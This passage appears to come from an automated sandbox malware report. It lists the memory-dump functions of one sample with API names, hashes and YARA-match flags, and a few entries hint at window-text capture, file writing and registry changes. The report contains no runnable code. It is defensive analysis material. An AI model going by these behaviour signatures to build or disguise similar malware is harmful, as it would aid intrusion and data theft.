                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: d432c042707113eef219af6e0ad2687e08b2bf50df0bf66eaea8f2f9f5c7417f
                          • Instruction ID: c2c15faa81b8b335dcbc94bd491a894e4ee4605c2b365d451cc6f13b830d1564
                          • Opcode Fuzzy Hash: d432c042707113eef219af6e0ad2687e08b2bf50df0bf66eaea8f2f9f5c7417f
                          • Instruction Fuzzy Hash: 7921C3324C8B984FFBA4AF58C182FE432F2EB59315F11516DE448C7592C730ED428782
                          Function 000001CFB95C92A1 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: cf7df7c98addab0dc0e3b1a63959e8151b81c0f80027ab393a2132f63f18ac25
                          • Instruction ID: dfd5e1518777574292f3d0c9fa477642521c336aae4c4d2124f47cf9e93d5682
                          • Opcode Fuzzy Hash: cf7df7c98addab0dc0e3b1a63959e8151b81c0f80027ab393a2132f63f18ac25
                          • Instruction Fuzzy Hash: 002181325C8B988FFB68AB58C542BA432F1FB59311F10116DE449C75D3D774DE428786
                          Function 000001CFB939AC9C Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
                          • Instruction ID: 1d4059699513e1ff989e2e857c6144cb570af959ee4fe59ab1e2554fbe512a00
                          • Opcode Fuzzy Hash: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
                          • Instruction Fuzzy Hash: A9214D30554A888FF7A4AE58C046BA537F5EF99311F3E02BDA45AC7293D770DE428782
                          Function 000001CFB95CEDA9 Relevance: 10.6, APIs: 7, Instructions: 71COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: 466cc7396c1cc10912a76d8dcb8aa306f0142ba951475728dc8fb5e6dd3ea738
                          • Instruction ID: f70c8ee4411f6e53f0771d8fd38175afba5f5ceb85a1fdbbd6266e8c432fc191
                          • Opcode Fuzzy Hash: 466cc7396c1cc10912a76d8dcb8aa306f0142ba951475728dc8fb5e6dd3ea738
                          • Instruction Fuzzy Hash: D72127331C96804EF3046B65DAD2BE83AF2EB45321F11453CF016879D3D775CE864655
                          Function 000001CFB93A1560 Relevance: 10.6, APIs: 7, Instructions: 71COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: dd9d7f979b81a8699f053dee8420159905e3cc7e97c07634a21e015c23129739
                          • Instruction ID: 8343bd85e0813b3510b75bbe6fb3ba3bc80b0d298f2dc3d42862ee5df645213c
                          • Opcode Fuzzy Hash: dd9d7f979b81a8699f053dee8420159905e3cc7e97c07634a21e015c23129739
                          • Instruction Fuzzy Hash: 0F21BE315856844AF714ABA4C896BEC77BAAF86320F2D457CE01B871E3C774CE428252
                          Function 000001CFB961BE94 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 09c70d8d37d13d61aee410d3f235f2ba24f94fa1cbdaf45efdae3760bbd383ae
                          • Instruction ID: 283dfd28dd101cb53813a9819233c90e386ba3a384ec746672b4a614141167b1
                          • Opcode Fuzzy Hash: 09c70d8d37d13d61aee410d3f235f2ba24f94fa1cbdaf45efdae3760bbd383ae
                          • Instruction Fuzzy Hash: AE21F9326505E249FA09AF35D982BED65739780BA1F46612CEF14073D6C778CE438B10
                          Function 000001CFB961B650 Relevance: 10.6, APIs: 7, Instructions: 66COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 1239332d20303c5a50c65b0066d77a0a022a4de7cac9ff6e062bd27df312ce82
                          • Instruction ID: 3af08efb0cd0729649725b51e1b401d4c39cf6cccf82d9f8b0bbb98f93be5176
                          • Opcode Fuzzy Hash: 1239332d20303c5a50c65b0066d77a0a022a4de7cac9ff6e062bd27df312ce82
                          • Instruction Fuzzy Hash: D721D4322501A245FA056F35D952BED6673A781BB1F4A232DDF350B3D6CB78CE428720
                          Function 000001CFB961E764 Relevance: 10.6, APIs: 7, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno
                          • String ID:
                          • API String ID: 1845094721-0
                          • Opcode ID: 92246146ac22801513e11eef1ccf583f360b70cb192a4f31d30353fc8b85e09a
                          • Instruction ID: 2c4793129b8cbaad7fa54abc60335d5e1c158495b866a9db6a530f7cab58adba
                          • Opcode Fuzzy Hash: 92246146ac22801513e11eef1ccf583f360b70cb192a4f31d30353fc8b85e09a
                          • Instruction Fuzzy Hash: 2E2105316806E345F6566F64E895BED6A73AB80790F05613DEA21073D2CB78CE43C310
                          Function 000001CFB96110A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringtimeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                          • String ID: [
                          • API String ID: 3163932117-4056885943
                          • Opcode ID: b85160648a62d3303c1f720c1aa9f274de9beabe1632b1bf58264dd0c81a2883
                          • Instruction ID: 74c3f28b2644877090f3c87e1868b069732f98341bf81eb6c8232773e81cbfdd
                          • Opcode Fuzzy Hash: b85160648a62d3303c1f720c1aa9f274de9beabe1632b1bf58264dd0c81a2883
                          • Instruction Fuzzy Hash: E0312C31658A96C1F750DB56F851BA6B3B3F784740F40402EA989426A9DF7CCA5ACF40
                          Function 000001CFB961F2D8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: db6b694d186b23cc907136b623f0fb9f1178e56bcf07348fea53597191f401e8
                          • Instruction ID: 1144f9ddf5f758ecc80f131561088e126bdd23ad8fa38866a36f6ea927bb2249
                          • Opcode Fuzzy Hash: db6b694d186b23cc907136b623f0fb9f1178e56bcf07348fea53597191f401e8
                          • Instruction Fuzzy Hash: 8B110B326842E285F7056F75D886BDC2673E7817A1F69263CAA15473D3C778CE438714
                          Function 000001CFB9615024 Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: fbb30c4e2186c998f425e18416f54d05b4074133aff0d1338df02403602f3b90
                          • Instruction ID: f003b97dffe112cd62e8919687c17a76e20ba9a9a70e17e3452bc3b937130ee6
                          • Opcode Fuzzy Hash: fbb30c4e2186c998f425e18416f54d05b4074133aff0d1338df02403602f3b90
                          • Instruction Fuzzy Hash: 741182324807E28AF760ABA1D4017DDB6B3F395BD1F59A128DF4407796CB38CE828781
                          Function 000001CFB96197D0 Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$write_char
                          • String ID:
                          • API String ID: 1772936973-0
                          • Opcode ID: 45baae2fde74618746f6b6203c9441344442621bcc6d007daa8fb462ddadbe2e
                          • Instruction ID: ecbd4b39761dec841757dc965e316d29bddd14913839b09f19b354b27677baaf
                          • Opcode Fuzzy Hash: 45baae2fde74618746f6b6203c9441344442621bcc6d007daa8fb462ddadbe2e
                          • Instruction Fuzzy Hash: 401167329807E286FB60AF12E4017DC66B3F794B90F09602ADB4407787CB38CE828741
                          Function 000001CFB9610FE0 Relevance: 10.5, APIs: 7, Instructions: 40filesynchronizationstringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                          • String ID:
                          • API String ID: 4202892810-0
                          • Opcode ID: 1fdd24094954658e294e17131c08b774f2d2fa2c2b92087c8cd534904e702a95
                          • Instruction ID: 53f659105151bd10b5cd992983932e0c6267315c7d285be452b26c9dec61fc39
                          • Opcode Fuzzy Hash: 1fdd24094954658e294e17131c08b774f2d2fa2c2b92087c8cd534904e702a95
                          • Instruction Fuzzy Hash: 1F117031244A8282F7509B15F818B997373F798BB4F504229DAAA037E5CF7CCA4ACB00
                          Function 000001CFB960D7BF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$CloseDeleteOpen
                          • String ID: Console$IpDatespecial
                          • API String ID: 3183427449-1840232981
                          • Opcode ID: ecf80bc97f28127a6a78c17fa9fa92f782d6466a7d39209f1e49dd3ba08303c1
                          • Instruction ID: 326e42d6428f96b2d743d6cae7445ce0bd4fa313da6ea37cf96677da661c7da1
                          • Opcode Fuzzy Hash: ecf80bc97f28127a6a78c17fa9fa92f782d6466a7d39209f1e49dd3ba08303c1
                          • Instruction Fuzzy Hash: E8015276355A8186F721DB14F954B883732F384BD8F404126CE4D43A98CF78C68AC718
                          Function 000001CFB93A31A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: MOC$RCC$csm
                          • API String ID: 3186804695-2671469338
                          • Opcode ID: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
                          • Instruction ID: 715aa2e631a4bd4cdfee6c8eea9410f1a6b7fb2337599f63f46fa3fd2f2dfc41
                          • Opcode Fuzzy Hash: d0c629851adb83669a1057044e1c73a61abea7eb16c4708499e842e3cc9a1464
                          • Instruction Fuzzy Hash: C7F030341411448FF7557724C00ABE832BAAF29305F6D56BD9845861B3E7AC8E828763
                          Function 000001CFB9623538 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$_amsg_exit
                          • String ID: MOC$RCC$csm
                          • API String ID: 2610988583-2671469338
                          • Opcode ID: 8d659f9cf181ea6894d5fd2041ae1ae5554f48ed223342e65feff7cba86f97e8
                          • Instruction ID: 141e07e3a170c475309c4cf990e2ec3ec78045ccbe3adeaa7eb9ef423355f31d
                          • Opcode Fuzzy Hash: 8d659f9cf181ea6894d5fd2041ae1ae5554f48ed223342e65feff7cba86f97e8
                          • Instruction Fuzzy Hash: E8F06535590282C7F7557B65C005BDC35B7E798B09F86A47E921842382C77DCF828A12
                          Function 000001CFB95C7255 Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno_getptd$_lockmalloc
                          • String ID:
                          • API String ID: 1369581901-0
                          • Opcode ID: fa3c888a0b64dc31fd6d50a7605defed2034a0cfb1504f517c669a6b37a44c87
                          • Instruction ID: 38de4b16b10b222c523c67b7a85ab020810a82dea93692d5ffa55ff7a870e8b5
                          • Opcode Fuzzy Hash: fa3c888a0b64dc31fd6d50a7605defed2034a0cfb1504f517c669a6b37a44c87
                          • Instruction Fuzzy Hash: A651AC31698A848FF794AB68D581BE97BF6EB59300F10417DD849C3AA2DB24DE438742
                          Function 000001CFB939F330 Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno_getptd$_lockmalloc
                          • String ID:
                          • API String ID: 1369581901-0
                          • Opcode ID: d61b86b512d42a64d26f0cc6f2a9babad53696149dbf6f9fd76c06f3c4ff0c9d
                          • Instruction ID: da0716b7bef316957649557ff8c49967023f91262b0d092133d65cdbc9fbc11b
                          • Opcode Fuzzy Hash: d61b86b512d42a64d26f0cc6f2a9babad53696149dbf6f9fd76c06f3c4ff0c9d
                          • Instruction Fuzzy Hash: F3519C30558A844EF750AB68D481BEA77EAEF88304F3C417DD85AC3292DB25DE438782
                          Function 000001CFB95B1261 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$malloc$_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 1789327305-1898527202
                          • Opcode ID: bec0fa3781f216dc962bf1dcecdcf35b177b188f5bd9887f529aa035ee97c4f6
                          • Instruction ID: 3201436e05ed4be90ea798d2cfc108c9c922ce32632fc3fbc481cde7b3d8ce2a
                          • Opcode Fuzzy Hash: bec0fa3781f216dc962bf1dcecdcf35b177b188f5bd9887f529aa035ee97c4f6
                          • Instruction Fuzzy Hash: C251F5B0458A598FEBD1DF18D088B957BF5FB18700F5581BAD80CCB26AEB70C9848F90
                          Function 000001CFB93917C0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$malloc$AllocateHeap_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 133375854-1898527202
                          • Opcode ID: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
                          • Instruction ID: 90003b40735148ad321cbacb5f1303dfcdbff6045103a234a32647c96e0105a9
                          • Opcode Fuzzy Hash: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
                          • Instruction Fuzzy Hash: 6A51D7B0414A598FEB90DF58C088B957BF5FB58700F6981BA981DDB26ADB70C944CFA0
                          Function 000001CFB9617784 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                          • String ID:
                          • API String ID: 3894533514-0
                          • Opcode ID: c68300e9c4ed9cf773f416173acfa5436c5f899a8b3552d1810b3d70258f5184
                          • Instruction ID: c25528b4abcfa1a8d68f00031c5bfaacfd85eb72e3a441ac368d77571a1d041e
                          • Opcode Fuzzy Hash: c68300e9c4ed9cf773f416173acfa5436c5f899a8b3552d1810b3d70258f5184
                          • Instruction Fuzzy Hash: 6E51CF326846D286F7989B25D440BE977B3F780B94F54613EDA9A473A6CB38CE07C700
                          Function 000001CFB9601790 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$Heapmalloc$AllocErrorFreeLast_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 161857241-1898527202
                          • Opcode ID: 67646a7dd6c968ecf2f44fcd8d8c0670da6240c8fc3f999a67afc5524764c4a7
                          • Instruction ID: 281513a03e77f43f2d995ac76127665303ca9369a61bbd3c8527db88bb06a28b
                          • Opcode Fuzzy Hash: 67646a7dd6c968ecf2f44fcd8d8c0670da6240c8fc3f999a67afc5524764c4a7
                          • Instruction Fuzzy Hash: 3541F472112B91C5E7808F25E58038D3ABAF748F88F5A813ADB8847798EF74C955CB60
                          Function 000001CFB95CAB11 Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$_errno$_lockfreemalloc
                          • String ID:
                          • API String ID: 360200360-0
                          • Opcode ID: b51325237b74aa9e7445f28ecc4ae510949fb52723a3c6bcf1fe359266725097
                          • Instruction ID: 9ddd9ad6b715aa74a9274bef6f0048fc43f523430a5d6291fa1fe28700e3bf72
                          • Opcode Fuzzy Hash: b51325237b74aa9e7445f28ecc4ae510949fb52723a3c6bcf1fe359266725097
                          • Instruction Fuzzy Hash: 092192321C8A898FF764AFA4D545BE976F3EB94304F11443DA00AC35D2DB78DE428741
                          Function 000001CFB939D8F0 Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _set_error_mode$_errno$_lockfreemalloc
                          • String ID:
                          • API String ID: 360200360-0
                          • Opcode ID: 99c55fd89446ed5a655e27bc626f276377e361e5d9c589b6ca3f3bf4f2833f14
                          • Instruction ID: dd3ac4d33f015051b002a9ae930f15b0c08260a9d9864ab2da3500286079d328
                          • Opcode Fuzzy Hash: 99c55fd89446ed5a655e27bc626f276377e361e5d9c589b6ca3f3bf4f2833f14
                          • Instruction Fuzzy Hash: B3215E302946998BF764BB68D456BA973BAEF89300F6C443DA05BC31D2DB64CE428751
                          Function 000001CFB961ACFC Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                          • String ID:
                          • API String ID: 517548149-0
                          • Opcode ID: b836d934eec16e7e78ac168315cfa26f01e2ad9148ac4e656bdc2540d0e8e9dd
                          • Instruction ID: 83529df84a4cc0bb8ec316fb3f97d34151b74a6657839e61873528fe1ffd9679
                          • Opcode Fuzzy Hash: b836d934eec16e7e78ac168315cfa26f01e2ad9148ac4e656bdc2540d0e8e9dd
                          • Instruction Fuzzy Hash: ED216D32A44BD586FB209F22E450B9977B7FB88BC1F495029DA8A47B54DF38CA52C704
                          Function 000001CFB9605320 Relevance: 9.1, APIs: 6, Instructions: 66synchronizationtimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventReset$CurrentObjectSingleThreadTimeWait_errno_invalid_parameter_noinfotime
                          • String ID:
                          • API String ID: 2543248268-0
                          • Opcode ID: 78e537520ed695ee5ae1225d7567b1703dce6c02efaa216bba7f739a809b494c
                          • Instruction ID: bc06a053c50b6aaf45489feef3bca37e10ffece0adc82afa1dccc16a655e2656
                          • Opcode Fuzzy Hash: 78e537520ed695ee5ae1225d7567b1703dce6c02efaa216bba7f739a809b494c
                          • Instruction Fuzzy Hash: 6E215E36244BD186E740DF21E8807997372F784F94F18513ADE4987768DF78CA42C740
                          Function 000001CFB9604D50 Relevance: 9.1, APIs: 6, Instructions: 57networkthreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
